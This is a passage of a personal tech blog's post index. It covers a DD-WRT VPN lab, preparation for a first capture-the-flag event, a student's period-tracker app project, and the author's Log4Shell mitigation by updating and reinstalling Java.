example of this is the firewall blocking traffic on external subnets, with it being masked behind routing misconfigurations and Apache misconfigurations. In hindsight, I should\u0026rsquo;ve tested this with two Linux VMs running web servers as I\u0026rsquo;m admittedly not familiar with using Windows as a server. Even if I wanted to stick with Windows as one of the endpoints, I probably should\u0026rsquo;ve gone with Windows Server to test it, but I\u0026rsquo;ll hide under the guise of \u0026ldquo;This is how I\u0026rsquo;m going to deploy it in my production environment, so it was a good thing I used Windows 11.\u0026rdquo;\nI\u0026rsquo;ve also learned that DD-WRT is extremely unstable in x86 virtual machines. It\u0026rsquo;s unclear if this would fair any better on physical hardware as I currently don\u0026rsquo;t have the time or space to test that, but if I had to hazard a guess it probably wouldn\u0026rsquo;t. I did also use the \u0026ldquo;public\u0026rdquo; image which does have limitations compared to the \u0026ldquo;full\u0026rdquo; image, the most notable of which is the vastly reduced number of connections. That may have played a part in some of the issues that I had, but I it goes without saying at this point that DD-WRT, in its current state, is not designed for x86 hardware. If you are looking to build your own router using x86 hardware, you might want to look at pfSense or opnSense. I could\u0026rsquo;ve also simulated this using Cisco Packet Tracer, and while I would\u0026rsquo;ve been able to take away a few things from it, it likely wouldn\u0026rsquo;t be as representative of me deploying it in my current environment.\n","permalink":"https://www.monicarose.tech/2022/11/site-to-site-vpn-with-dd-wrt/","summary":"Admittedly, I\u0026rsquo;m pretty unfamiliar with VPNs, especially with setting up VPNs on routers. I\u0026rsquo;ve followed the excellent guide by egc to set up VPNs for my individual clients, such as my desktop or my laptop. However, one of the next logical steps is to learn how to set up a site-to-site VPN with DD-WRT. One of the issues with deploying it right now is that I\u0026rsquo;m currently an hour away from the other location.","title":"Site to Site VPN with DD-WRT"},{"content":"On October 27th at 7 AM CDT, GuidePoint Security opened their 2022 Capture the Flag. This also happens to be the first Capture the Flag that I have ever participated in. As of me writing this blog post, I have yet to start as the CTF hasn\u0026rsquo;t started. Prior to me starting the event, I opted to get some tools set up in advance:\nVMWare Workstation 16 Kali Linux Sublime Text \u0026amp; Visual Studio Code Working OpenVPN install ILSpy gobuster \u0026amp; dirbuster nmap nitko Additionally, I have set up the following resources to be easily accessible:\nrockyou.txt for password evaluation directory-list-2.3-medium.txt for website directory evaluation I also opted to enable NAT networking to be able to easily access resources on the virtual machine from my laptop, as I have a strong belief that it is important to have different working environments during the day, especially when working on a large project. Furthermore, my Kali Linux virtual machine is being mirrored to my Proxmox Server at my house to ensure I have a working and stable environment.\nPlease, check back in often as I will be updating this as the CTF progresses. No write ups will be provided until after the CTF has concluded. ","permalink":"https://www.monicarose.tech/2022/10/guidepoint-security-2022-capture-the-flag/","summary":"On October 27th at 7 AM CDT, GuidePoint Security opened their 2022 Capture the Flag. This also happens to be the first Capture the Flag that I have ever participated in. As of me writing this blog post, I have yet to start as the CTF hasn\u0026rsquo;t started. Prior to me starting the event, I opted to get some tools set up in advance:\nVMWare Workstation 16 Kali Linux Sublime Text \u0026amp; Visual Studio Code Working OpenVPN install ILSpy gobuster \u0026amp; dirbuster nmap nitko Additionally, I have set up the following resources to be easily accessible:","title":"My First Capture The Flag"},{"content":"Programming can be an absolutely time consuming process, especially when you\u0026rsquo;re doing it when you\u0026rsquo;re a full time student and working a part time job. So how do I manage that?\nThe Timeline A lot of the projects that I work on are small, relatively simple, and sporadic. Looking at my GitHub, you\u0026rsquo;ll notice that I\u0026rsquo;ll commit to a project for a few days, then switch to a different one altogether. Sometimes new projects will take up to 6 months to start working on, seldom returning to the old ones. This is, unfortunately, one of the consequences of being a student and taking up programming as a hobby. In fact, it wasn\u0026rsquo;t until a story broke out that Flo was caught selling user\u0026rsquo;s data to companies. That was the inspiration for me to start building my own period tracking app\nStarting the Project While I have data that goes back as early as May 9th 2022, I started theorizing this project as early as late April of that year. I realized that, since I was a transgender woman, I never needed to use a period tracking app and didn\u0026rsquo;t know what was wanted in one. As such, the most responsible way I theorized to get accurate data was to ask my peers to take a survey. Questions consisted of what period tracking app they currently use, what they liked and didn\u0026rsquo;t like, what features they wanted integrated, and things that may have affected a cycle, since not everyone has consistent cycles. It was this data that I used to start the project.\nHello World Starting a new programming project has always felt the same way for me: excitement of starting a new project, followed by me wondering what I got myself into five minutes into the project. But with this, there was a third feeling: the excitement of being able to have made a significant change in someone\u0026rsquo;s life. Under the code name foss-period-tracker 1, I opened up my IDE2 of choice and began building a proof of concept for a period tracking app. It didn\u0026rsquo;t need to be fancy for a proof of concept, nor did it need to be perfect. But it needed to have some sort of functionality. I built my own date format class3 to be able to translate Strings into dates and vice versa. After prototyping something, I created a repository on GitHub, and ran some terminal commands.\ngit add . git commit -m \u0026#34;Initial Commit\u0026#34; git push git@github.com:/TotallyMonica/foss-period-tracker Sure enough, my first commit was done. But this time, I knew I wasn\u0026rsquo;t done. I knew that this proof of concept was just that: a proof of concept.\nTime Management As this project started, I ran head first into a major hurdle. Finals was just about to start, and I needed to study for that. While yes I could\u0026rsquo;ve studied by working on this since I was taking a programming class, I determined it wasn\u0026rsquo;t worth the time, effort, headache, and the likelihood that I\u0026rsquo;d get too focused on the project to study for some of my other classes. So just as quickly as it came, my interest in continuing the project had left me. I didn\u0026rsquo;t start working on it again until July 2022, when I\u0026rsquo;d take a road trip down to Mammoth Caves that I would continue working on it. I tethered my laptop to my phone\u0026rsquo;s hotspot, and began working on the project a ton on that drive down. One of my friends noticed that repository and how much I was committing to the project and pitched in where she could. However, when I got to where I was going to be staying for the vacation, I put my laptop up and forgot about it again. In late July, I picked up the project again, and made some leaps and strides with one of the major hurdles that I had, which was actually debugging some of my classes.\nDebugging I wouldn\u0026rsquo;t be shocked if a majority of programming comes from debugging, which is where the head banging kicks in. And with the debugging comes the pain of having ADHD. Since I have ADHD, I tend to get sidetracked easily. So when I have a project that keeps telling me that 10+20=1020, suddenly it becomes very appealing to step aside for a while. My first proper prototype was built on August 4th, 2022 where I was able to successfully define that I had a consistent period that took place every 28 days lasting for 4 days, acting as if I had just gotten off of my period. While there\u0026rsquo;s more to go from that, the first major debugging obstacle was taken care of. Right before this first major prototype had been built, I had been admitted to Southeast Missouri University, and I had been scampering around getting everything sorted out. Clearing this obstacle made it clear to me that, while not perfect, I was on the right path to making something good.\nDefinitions FOSS1: Free and Open Source Software. Free, in this context, doesn\u0026rsquo;t necessarily mean $0, but rather free as in freedom\nIDE2: Integrated Development Environment. While my IDE of choice for this project is Eclipse, there are many IDEs in the world, notably Visual Studio Code, Atom, and Sublime Text\nClass3: A blueprint/template for a data type. Sort of think of it as a program within your program\nThis article is still being written. Come back in a future date when there are more updates. ","permalink":"https://www.monicarose.tech/2022/08/programming-as-a-student/","summary":"Programming can be an absolutely time consuming process, especially when you\u0026rsquo;re doing it when you\u0026rsquo;re a full time student and working a part time job. So how do I manage that?\nThe Timeline A lot of the projects that I work on are small, relatively simple, and sporadic. Looking at my GitHub, you\u0026rsquo;ll notice that I\u0026rsquo;ll commit to a project for a few days, then switch to a different one altogether.","title":"Programming as a Student"},{"content":"On December 10, 2021, a vulnerability within the Log4j2 library was discovered. Due to how widespread Log4j2 is, I had to mitigate the damage as quickly and efficiently as possible.\nWhat is Log4j? Log4j is a library in Java used for logging actions done within a program. These actions can include error messages, user input, responses, and warnings and are often used to refer back to what caused a given issue or determine how to optimize a program. In fact, there\u0026rsquo;s likely a good chance that you have used a logging library like Log4j before, whether realizing it or not. Due to the nature of Java and Log4j, modifications to the code are often encouraged for your use case. Such modifications, or forks, can include the ability to parse links, anonymize users, enable compatibility, and back up logs.\nLog4j 2 specifically is a fork of Log4j to include patches for vulnerabilities, performance improvements, better API support, and filtering, just to name a few. Because it was based on Log4j, Log4j 2 is meant to be a drop-in replacement for its predecessor with little to no additional work done on the programmer\u0026rsquo;s end.\nStep 0 - Determining Potential Roadblocks The main issue with attempting to mitigate these types of issue is how Java and, by extent, Log4j is implemented. Most modern day implementations of Java is in a matter beyond our control, often compiled into executable that your operating system can understand without installing dependencies. While irrelevant to my workflows, Ubiquiti\u0026rsquo;s controller software, IPMI for various computers, and even car stereos are based off of Java as examples. Due to the closed nature of them, the best that I can do is update what I can and pray that the vulnerability has been taken care of. Ubiquiti actually made the update known and made that exploit fix one of, if not the first line, in the change log.\nWhat I can control, however, is what software I used and patch the issue in any open source programs that I use. That being said, all of my outside facing servers have automatic updates set up and configured with a set-it-and-forget-it mindset. While for severe issues such as this necessitate manually checking, it serves well for the occasional performance update, less severe security issues, and generalized bug fixes. The main things I was concerned about were programs that I haven\u0026rsquo;t used in extended periods of time.\nStep 1 - Removing Java The computers and servers that I had a keen eye on were the following, with some obfuscation put in place for privacy concerns\nMy desktop running Fedora Linux 35 - KDE Plasma spin My laptop from Framework running Windows 11 TrueNAS Scale Beta Server - Based off of Debian 10 Buster Proxmox 7.4 Server - Based off of Debian 11 Bullseye Raspberry Pi running Raspberry Pi OS Bullseye 64 bit serving as a remote backup server Ubuntu Server 20.04 on a Linode server that\u0026rsquo;s used as a project server The server running this website using Wordpress on a Linode server Furthermore, I had various client computers and servers I needed to get upgraded immediately, but due to privacy concerns I\u0026rsquo;m electing to not share their hardware and software setup.\nBecause most of my hardware had at one point used Java, I first needed to check to see if Java was installed and if it was determine what version it was.\n$ java -version This revealed a lot of information. If I had Java installed, the version that was used most of the time was a relatively recent patch of 1.8. Ideally, I should\u0026rsquo;ve been running 17 regardless. For my Linux based hardware, I needed to remove any variant of Java potentially installed.\n# apt-get purge *java* # dnf remove *java* As for Windows, I simply opened up Settings -\u0026gt; Apps and search for Java and uninstalled anything that came up. Furthermore, I ended up ensuring I had the latest versions of Visual Studio Code and Eclipse installed because, even though they used the development kit of whatever language you want to use, I didn\u0026rsquo;t want to take any chances.\nStep 2: Forcing Updates to be Installed For programs I was unsure of what language programs were using, I forced updates to be checked on everything. I\u0026rsquo;ve been using winget on Windows since it was first announced as a first-party package manager for Windows. While it\u0026rsquo;s still flawed to this day, it covers well over 90% of my programs that I use.\nPS C:\\Windows\\System32\u0026gt; winget update --all Winget was able to update most of the programs that needed to be updated. The ones that weren\u0026rsquo;t covered I went and manually installed the latest version. Linux machines, on the other hand, were significantly easier to update due to the nature of how programs are installed.\n# apt-get update # apt-get upgrade -y # dnf update -y I ran apt-get on Debian and Ubuntu based servers and dnf on Fedora systems to make sure I was fully updated.\nStep 3: Installing Java Due to the nature of the issue, I repeatedly checked for updates over the span of a week, as multiple different variants of this issue came up after the root bug was discovered. By about late December, I had decided that I was updated enough. I ended up installing the latest version of Java JDK 17 that previously had and was known to need Java to ensure I had the least bug prone version.\n# apt-get install java-jdk-latest # dnf install java-openjdk-latest As for Windows being concerned, I ended up going to Oracles website and downloading the latest version of the Java 17 JDK.\nWhat Took So Long? This has been sitting in my drafts since the issue was discovered and I even started writing it as I was taking care of security issues. It led to a philosophical question: is security through obscurity good security or masking bad security? Ultimately I decided that it can be a good measure, but more often than not it shows that you\u0026rsquo;re not confident in your security measures. I also publish all of my works to GitHub, so for me to not have my efforts publicized and available to others shows a lack of confidence in my efforts. Furthermore, another question came up: was my mitigation effective? Or did I uninstall and reinstall Java for no reason? Aside from the peace of mind, I have noticed that several of my programs that I use regularly had Log4j patches pushed, including the core Java program itself.\nConclusion I learned from this that it can be easy to become complacent with your updates, especially with zero-day vulnerabilities like this. Furthermore, this tested my remote management skills to ensure I was even able to still make connections to my machines regardless of where I was.\n","permalink":"https://www.monicarose.tech/2022/02/log4shell-my-damage-mitigation-strategy/","summary":"On December 10, 2021, a vulnerability within the Log4j2 library was discovered. Due to how widespread Log4j2 is, I had to mitigate the damage as quickly and efficiently as possible.\nWhat is Log4j? Log4j is a library in Java used for logging actions done within a program. These actions can include error messages, user input, responses, and warnings and are often used to refer back to what caused a given issue or determine how to optimize a program.","title":"Log4Shell: My damage mitigation strategy"}]